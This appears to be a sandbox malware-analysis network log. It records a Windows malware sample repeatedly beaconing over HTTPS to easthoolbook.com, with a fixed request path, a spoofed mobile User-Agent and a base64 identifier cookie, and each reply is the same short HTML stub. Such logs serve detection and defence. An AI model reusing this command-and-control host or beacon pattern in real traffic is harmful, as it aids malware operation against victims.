                                                                          Date: Fri, 19 Apr 2024 13:29:08 GMT
                                                                          Connection: close
                                                                          Content-Type: text/html
                                                                          Server: cloudflare
                                                                          Content-Length: 600
                                                                          2024-04-19 13:31:49 UTC600INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 27 69 65 20 69 65 37 27 20 6c 61 6e 67 3d 27 65 6e 2d 55 53 27 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 27 69 65 20 69 65 38 27 20 6c 61 6e 67 3d 27 65 6e 2d 55 53 27 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 3c 21 2d 2d 5b 69 66 20 21 28 49 45 20 37 29 20 7c 20 21 28 49 45 20 38 29 20 20 5d 3e 3c 21 2d 2d 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 27 65 6e 2d 55 53 27 3e 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 20 20 20 20 3c 68 65 61 64 3e 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 27 55 54 46 2d 38 27 20 2f 3e 20 20 20 20 20 20 20 20 3c
                                                                          Data Ascii: <!DOCTYPE html>...[if IE 7]><html class='ie ie7' lang='en-US'><![endif]-->...[if IE 8]><html class='ie ie8' lang='en-US'><![endif]-->...[if !(IE 7) | !(IE 8) ]>...><html lang='en-US'>...<![endif]--> <head> <meta charset='UTF-8' /> <


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          17192.168.2.64972489.150.57.464436516C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-04-19 13:31:52 UTC517OUTGET /sign.mpeg?dare=true HTTP/1.1
                                                                          Host: easthoolbook.com
                                                                          Accept: application/xml
                                                                          Cookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==
                                                                          User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36
                                                                          Connection: Close
                                                                          Cache-Control: no-cache
                                                                          2024-04-19 13:31:52 UTC141INHTTP/1.1 200 OK
                                                                          Date: Fri, 19 Apr 2024 13:29:11 GMT
                                                                          Connection: close
                                                                          Content-Type: text/html
                                                                          Server: cloudflare
                                                                          Content-Length: 600
                                                                          2024-04-19 13:31:52 UTC600INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 27 69 65 20 69 65 37 27 20 6c 61 6e 67 3d 27 65 6e 2d 55 53 27 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 27 69 65 20 69 65 38 27 20 6c 61 6e 67 3d 27 65 6e 2d 55 53 27 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 3c 21 2d 2d 5b 69 66 20 21 28 49 45 20 37 29 20 7c 20 21 28 49 45 20 38 29 20 20 5d 3e 3c 21 2d 2d 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 27 65 6e 2d 55 53 27 3e 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 20 20 20 20 3c 68 65 61 64 3e 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 27 55 54 46 2d 38 27 20 2f 3e 20 20 20 20 20 20 20 20 3c
                                                                          Data Ascii: <!DOCTYPE html>...[if IE 7]><html class='ie ie7' lang='en-US'><![endif]-->...[if IE 8]><html class='ie ie8' lang='en-US'><![endif]-->...[if !(IE 7) | !(IE 8) ]>...><html lang='en-US'>...<![endif]--> <head> <meta charset='UTF-8' /> <


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          18192.168.2.64972689.150.57.464436516C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-04-19 13:31:55 UTC517OUTGET /sign.mpeg?dare=true HTTP/1.1
                                                                          Host: easthoolbook.com
                                                                          Accept: application/xml
                                                                          Cookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==
                                                                          User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36
                                                                          Connection: Close
                                                                          Cache-Control: no-cache
                                                                          2024-04-19 13:31:55 UTC141INHTTP/1.1 200 OK
                                                                          Date: Fri, 19 Apr 2024 13:29:14 GMT
                                                                          Connection: close
                                                                          Content-Type: text/html
                                                                          Server: cloudflare
                                                                          Content-Length: 600
                                                                          2024-04-19 13:31:55 UTC600INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 27 69 65 20 69 65 37 27 20 6c 61 6e 67 3d 27 65 6e 2d 55 53 27 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 27 69 65 20 69 65 38 27 20 6c 61 6e 67 3d 27 65 6e 2d 55 53 27 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 3c 21 2d 2d 5b 69 66 20 21 28 49 45 20 37 29 20 7c 20 21 28 49 45 20 38 29 20 20 5d 3e 3c 21 2d 2d 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 27 65 6e 2d 55 53 27 3e 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 20 20 20 20 3c 68 65 61 64 3e 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 27 55 54 46 2d 38 27 20 2f 3e 20 20 20 20 20 20 20 20 3c
                                                                          Data Ascii: <!DOCTYPE html>...[if IE 7]><html class='ie ie7' lang='en-US'><![endif]-->...[if IE 8]><html class='ie ie8' lang='en-US'><![endif]-->...[if !(IE 7) | !(IE 8) ]>...><html lang='en-US'>...<![endif]--> <head> <meta charset='UTF-8' /> <


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          19192.168.2.64972789.150.57.464436516C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-04-19 13:31:58 UTC517OUTGET /sign.mpeg?dare=true HTTP/1.1
                                                                          Host: easthoolbook.com
                                                                          Accept: application/xml
                                                                          Cookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==
                                                                          User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36
                                                                          Connection: Close
                                                                          Cache-Control: no-cache
                                                                          2024-04-19 13:31:58 UTC141INHTTP/1.1 200 OK
                                                                          Date: Fri, 19 Apr 2024 13:29:17 GMT
                                                                          Connection: close
                                                                          Content-Type: text/html
                                                                          Server: cloudflare
                                                                          Content-Length: 600
                                                                          2024-04-19 13:31:58 UTC600INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 27 69 65 20 69 65 37 27 20 6c 61 6e 67 3d 27 65 6e 2d 55 53 27 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 27 69 65 20 69 65 38 27 20 6c 61 6e 67 3d 27 65 6e 2d 55 53 27 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 3c 21 2d 2d 5b 69 66 20 21 28 49 45 20 37 29 20 7c 20 21 28 49 45 20 38 29 20 20 5d 3e 3c 21 2d 2d 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 27 65 6e 2d 55 53 27 3e 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 20 20 20 20 3c 68 65 61 64 3e 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 27 55 54 46 2d 38 27 20 2f 3e 20 20 20 20 20 20 20 20 3c
                                                                          Data Ascii: <!DOCTYPE html>...[if IE 7]><html class='ie ie7' lang='en-US'><![endif]-->...[if IE 8]><html class='ie ie8' lang='en-US'><![endif]-->...[if !(IE 7) | !(IE 8) ]>...><html lang='en-US'>...<![endif]--> <head> <meta charset='UTF-8' /> <


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          20192.168.2.64972889.150.57.464436516C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-04-19 13:32:01 UTC517OUTGET /sign.mpeg?dare=true HTTP/1.1
                                                                          Host: easthoolbook.com
                                                                          Accept: application/xml
                                                                          Cookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==
                                                                          User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36
                                                                          Connection: Close
                                                                          Cache-Control: no-cache
                                                                          2024-04-19 13:32:01 UTC141INHTTP/1.1 200 OK
                                                                          Date: Fri, 19 Apr 2024 13:29:20 GMT
                                                                          Connection: close
                                                                          Content-Type: text/html
                                                                          Server: cloudflare
                                                                          Content-Length: 600
                                                                          2024-04-19 13:32:01 UTC600INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 27 69 65 20 69 65 37 27 20 6c 61 6e 67 3d 27 65 6e 2d 55 53 27 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 27 69 65 20 69 65 38 27 20 6c 61 6e 67 3d 27 65 6e 2d 55 53 27 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 3c 21 2d 2d 5b 69 66 20 21 28 49 45 20 37 29 20 7c 20 21 28 49 45 20 38 29 20 20 5d 3e 3c 21 2d 2d 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 27 65 6e 2d 55 53 27 3e 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 20 20 20 20 3c 68 65 61 64 3e 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 27 55 54 46 2d 38 27 20 2f 3e 20 20 20 20 20 20 20 20 3c
                                                                          Data Ascii: <!DOCTYPE html>...[if IE 7]><html class='ie ie7' lang='en-US'><![endif]-->...[if IE 8]><html class='ie ie8' lang='en-US'><![endif]-->...[if !(IE 7) | !(IE 8) ]>...><html lang='en-US'>...<![endif]--> <head> <meta charset='UTF-8' /> <


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          21192.168.2.64972989.150.57.464436516C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-04-19 13:32:05 UTC517OUTGET /sign.mpeg?dare=true HTTP/1.1
                                                                          Host: easthoolbook.com
                                                                          Accept: application/xml
                                                                          Cookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==
                                                                          User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36
                                                                          Connection: Close
                                                                          Cache-Control: no-cache
                                                                          2024-04-19 13:32:06 UTC141INHTTP/1.1 200 OK
                                                                          Date: Fri, 19 Apr 2024 13:29:24 GMT
                                                                          Connection: close
                                                                          Content-Type: text/html
                                                                          Server: cloudflare
                                                                          Content-Length: 600
                                                                          2024-04-19 13:32:06 UTC600INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 27 69 65 20 69 65 37 27 20 6c 61 6e 67 3d 27 65 6e 2d 55 53 27 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 27 69 65 20 69 65 38 27 20 6c 61 6e 67 3d 27 65 6e 2d 55 53 27 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 3c 21 2d 2d 5b 69 66 20 21 28 49 45 20 37 29 20 7c 20 21 28 49 45 20 38 29 20 20 5d 3e 3c 21 2d 2d 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 27 65 6e 2d 55 53 27 3e 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 20 20 20 20 3c 68 65 61 64 3e 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 27 55 54 46 2d 38 27 20 2f 3e 20 20 20 20 20 20 20 20 3c
                                                                          Data Ascii: <!DOCTYPE html>...[if IE 7]><html class='ie ie7' lang='en-US'><![endif]-->...[if IE 8]><html class='ie ie8' lang='en-US'><![endif]-->...[if !(IE 7) | !(IE 8) ]>...><html lang='en-US'>...<![endif]--> <head> <meta charset='UTF-8' /> <


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          22192.168.2.64973089.150.57.464436516C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-04-19 13:32:08 UTC517OUTGET /sign.mpeg?dare=true HTTP/1.1
                                                                          Host: easthoolbook.com
                                                                          Accept: application/xml
                                                                          Cookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==
                                                                          User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36
                                                                          Connection: Close
                                                                          Cache-Control: no-cache
                                                                          2024-04-19 13:32:09 UTC141INHTTP/1.1 200 OK
                                                                          Date: Fri, 19 Apr 2024 13:29:27 GMT
                                                                          Connection: close
                                                                          Content-Type: text/html
                                                                          Server: cloudflare
                                                                          Content-Length: 600
                                                                          2024-04-19 13:32:09 UTC600INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 27 69 65 20 69 65 37 27 20 6c 61 6e 67 3d 27 65 6e 2d 55 53 27 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 27 69 65 20 69 65 38 27 20 6c 61 6e 67 3d 27 65 6e 2d 55 53 27 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 3c 21 2d 2d 5b 69 66 20 21 28 49 45 20 37 29 20 7c 20 21 28 49 45 20 38 29 20 20 5d 3e 3c 21 2d 2d 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 27 65 6e 2d 55 53 27 3e 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 20 20 20 20 3c 68 65 61 64 3e 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 27 55 54 46 2d 38 27 20 2f 3e 20 20 20 20 20 20 20 20 3c
                                                                          Data Ascii: <!DOCTYPE html>...[if IE 7]><html class='ie ie7' lang='en-US'><![endif]-->...[if IE 8]><html class='ie ie8' lang='en-US'><![endif]-->...[if !(IE 7) | !(IE 8) ]>...><html lang='en-US'>...<![endif]--> <head> <meta charset='UTF-8' /> <


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          23192.168.2.64973189.150.57.464436516C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-04-19 13:32:11 UTC517OUTGET /sign.mpeg?dare=true HTTP/1.1
                                                                          Host: easthoolbook.com
                                                                          Accept: application/xml
                                                                          Cookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==
                                                                          User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36
                                                                          Connection: Close
                                                                          Cache-Control: no-cache
                                                                          2024-04-19 13:32:12 UTC141INHTTP/1.1 200 OK
                                                                          Date: Fri, 19 Apr 2024 13:29:30 GMT
                                                                          Connection: close
                                                                          Content-Type: text/html
                                                                          Server: cloudflare
                                                                          Content-Length: 600
                                                                          2024-04-19 13:32:12 UTC600INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 27 69 65 20 69 65 37 27 20 6c 61 6e 67 3d 27 65 6e 2d 55 53 27 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 27 69 65 20 69 65 38 27 20 6c 61 6e 67 3d 27 65 6e 2d 55 53 27 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 3c 21 2d 2d 5b 69 66 20 21 28 49 45 20 37 29 20 7c 20 21 28 49 45 20 38 29 20 20 5d 3e 3c 21 2d 2d 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 27 65 6e 2d 55 53 27 3e 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 20 20 20 20 3c 68 65 61 64 3e 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 27 55 54 46 2d 38 27 20 2f 3e 20 20 20 20 20 20 20 20 3c
                                                                          Data Ascii: <!DOCTYPE html>...[if IE 7]><html class='ie ie7' lang='en-US'><![endif]-->...[if IE 8]><html class='ie ie8' lang='en-US'><![endif]-->...[if !(IE 7) | !(IE 8) ]>...><html lang='en-US'>...<![endif]--> <head> <meta charset='UTF-8' /> <


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          24192.168.2.64973289.150.57.464436516C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-04-19 13:32:14 UTC517OUTGET /sign.mpeg?dare=true HTTP/1.1
                                                                          Host: easthoolbook.com
                                                                          Accept: application/xml
                                                                          Cookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==
                                                                          User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36
                                                                          Connection: Close
                                                                          Cache-Control: no-cache
                                                                          2024-04-19 13:32:15 UTC141INHTTP/1.1 200 OK
                                                                          Date: Fri, 19 Apr 2024 13:29:33 GMT
                                                                          Connection: close
                                                                          Content-Type: text/html
                                                                          Server: cloudflare
                                                                          Content-Length: 600
                                                                          2024-04-19 13:32:15 UTC600INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 27 69 65 20 69 65 37 27 20 6c 61 6e 67 3d 27 65 6e 2d 55 53 27 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 27 69 65 20 69 65 38 27 20 6c 61 6e 67 3d 27 65 6e 2d 55 53 27 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 3c 21 2d 2d 5b 69 66 20 21 28 49 45 20 37 29 20 7c 20 21 28 49 45 20 38 29 20 20 5d 3e 3c 21 2d 2d 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 27 65 6e 2d 55 53 27 3e 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 20 20 20 20 3c 68 65 61 64 3e 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 27 55 54 46 2d 38 27 20 2f 3e 20 20 20 20 20 20 20 20 3c
                                                                          Data Ascii: <!DOCTYPE html>...[if IE 7]><html class='ie ie7' lang='en-US'><![endif]-->...[if IE 8]><html class='ie ie8' lang='en-US'><![endif]-->...[if !(IE 7) | !(IE 8) ]>...><html lang='en-US'>...<![endif]--> <head> <meta charset='UTF-8' /> <


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          25192.168.2.64973389.150.57.464436516C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-04-19 13:32:17 UTC517OUTGET /sign.mpeg?dare=true HTTP/1.1
                                                                          Host: easthoolbook.com
                                                                          Accept: application/xml
                                                                          Cookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==
                                                                          User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36
                                                                          Connection: Close
                                                                          Cache-Control: no-cache
                                                                          2024-04-19 13:32:18 UTC141INHTTP/1.1 200 OK
                                                                          Date: Fri, 19 Apr 2024 13:29:36 GMT
                                                                          Connection: close
                                                                          Content-Type: text/html
                                                                          Server: cloudflare
                                                                          Content-Length: 600
                                                                          2024-04-19 13:32:18 UTC600INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 27 69 65 20 69 65 37 27 20 6c 61 6e 67 3d 27 65 6e 2d 55 53 27 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 27 69 65 20 69 65 38 27 20 6c 61 6e 67 3d 27 65 6e 2d 55 53 27 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 3c 21 2d 2d 5b 69 66 20 21 28 49 45 20 37 29 20 7c 20 21 28 49 45 20 38 29 20 20 5d 3e 3c 21 2d 2d 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 27 65 6e 2d 55 53 27 3e 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 20 20 20 20 3c 68 65 61 64 3e 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 27 55 54 46 2d 38 27 20 2f 3e 20 20 20 20 20 20 20 20 3c
                                                                          Data Ascii: <!DOCTYPE html>...[if IE 7]><html class='ie ie7' lang='en-US'><![endif]-->...[if IE 8]><html class='ie ie8' lang='en-US'><![endif]-->...[if !(IE 7) | !(IE 8) ]>...><html lang='en-US'>...<![endif]--> <head> <meta charset='UTF-8' /> <


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          26192.168.2.64973589.150.57.464436516C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-04-19 13:32:20 UTC517OUTGET /sign.mpeg?dare=true HTTP/1.1
                                                                          Host: easthoolbook.com
                                                                          Accept: application/xml
                                                                          Cookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==
                                                                          User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36
                                                                          Connection: Close
                                                                          Cache-Control: no-cache
                                                                          2024-04-19 13:32:21 UTC141INHTTP/1.1 200 OK
                                                                          Date: Fri, 19 Apr 2024 13:29:39 GMT
                                                                          Connection: close
                                                                          Content-Type: text/html
                                                                          Server: cloudflare
                                                                          Content-Length: 600
